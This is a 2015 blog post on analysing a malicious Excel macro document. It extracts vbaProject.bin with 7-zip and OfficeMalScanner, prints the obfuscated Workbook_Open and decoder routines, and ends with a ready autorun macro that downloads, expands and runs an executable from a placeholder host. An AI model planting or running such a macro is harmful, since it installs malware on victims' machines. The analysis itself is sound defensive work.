date: 2015-02-26

Lenny Zeltzers cheat sheet will tell you how to extract the macros, however it does not tell you what to do with the macros, or at least point you in the right direction to reveal the code in a more human readable way.

Procedure

In this example I have a new excel formatted document .xlsm. In order to pull out the macro we need to open the file in 7-zip since it is just an archive container.

Go into the xl directory and extract the vbaProject.bin

Now we can use OfficeMalScanner from www.reconstructer.org.

I tend to create a working folder to drop malware into and extract artifacts etc.

Open up powershell prompt and

cd “C:\Users\myaccount\Desktop\Malware Analysis\17-02-15”

I tend to put programs that don’t require installation under c:\bin\ we will now use office mal scanner to extract the vb code.

C:\bin\OfficeMalScanner\OfficeMalScanner.exe .\vbaProject.bin info

Now in your working folder, we should have the extracted contents in folder called, VBAPROJECT.BIN-Macros.

We have a lot of files, so we need to join them up so it’s easier to debug what’s going on here. 

Manual method is to select all files and edit in notepad++, create a new file and copy them in one by one, closing each file that has been copied. I save this files as combined.txt.

However it’s easier to use powershell to do our bidding.

cd .\VBAPROJECT.BIN-Macros

This simple powershell command will join up the files, however the file beginning with __ will be at the end and this has the first routine called.

It looks like the __SRP_1d is the project file for the vb macro inside the doc, and as such contains the first function it should execute on document load.

By combining all these files it should be easier to search for the function that is called.

Sub Workbook_Open()

    tyrtyaag

End Sub

Searching for the highlighted text finds.

Attribute VB_Name = “Module11”

Sub tyrtyaag()

Shell FfdsfF, vbHide

End Sub

I can see here that it is creating a value that is equal to a routine with something passed into it, this looks like the beginning of a decode routine. So I search for the highlighted routine. The shell call will execute the variable that has been decoded.

Attribute VB_Name = “Module14”

Public Function NewQkeTzIIHM(ByVal AESdyLylMjhJrIu As String) As String

GoTo lZiGBegMhmukPZZYdz

lZiGBegMhmukPZZYdz:

GoTo httIMPHgvoYFI

httIMPHgvoYFI:

GoTo JYUDQqqRamOiNl

JYUDQqqRamOiNl:

GoTo DOIbKh

DOIbKh:

Dim YyJDVSqLkdZk As Long

GoTo epGUden

epGUden:

For YyJDVSqLkdZk = 1 To Len(AESdyLylMjhJrIu)

GoTo lRYrzpUP

lRYrzpUP:

GoTo TELSjKJaPRJjLqoQK

TELSjKJaPRJjLqoQK:

GoTo MblTSGGiqCfyeCTgTRL

MblTSGGiqCfyeCTgTRL:

GoTo xhsyu

xhsyu:

GoTo YtuEcImBipHPFlghfkUO

YtuEcImBipHPFlghfkUO:

NewQkeTzIIHM = NewQkeTzIIHM & Chr(Asc(Mid(AESdyLylMjhJrIu, YyJDVSqLkdZk, 1)) - 13)

GoTo Lcgja

Lcgja:

GoTo Hrnbw

Hrnbw:

GoTo rBkkQJ

rBkkQJ:

GoTo TiOhSQwlicurNkI

TiOhSQwlicurNkI:

Next YyJDVSqLkdZk

GoTo ZoJKUeZCSlFZSIowxvAm

ZoJKUeZCSlFZSIowxvAm:

GoTo QddswzqP

QddswzqP:

GoTo HpsMptHRnAnaBQVygxjn

HpsMptHRnAnaBQVygxjn:

GoTo ysKHfAZQM

ysKHfAZQM:

GoTo EaNQvpSUBV

EaNQvpSUBV:

End Function

So we can use the code to reveal itself if we break it’s flow. Open word and create a new macro module. Copy in both functions and remove the shell line. Take out some of the content in the ( ) and run the macro.

I got this message;

Now I’ll add in some more and see how this develops.

Ultimately we end up with.

So in short the simplest way to replicate this type of attack is to embed the following autorun macro.

Sub simple() Shell “cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile(‘http://somehost/this/folder/nasty.jpg’,’%TEMP%\nasty.cab’); expand %TEMP%\nasty.cab %TEMP%\nasty.exe; start %TEMP%\nasty.exe;”, vbHide End Sub

This will fail if a proxy is required by the way.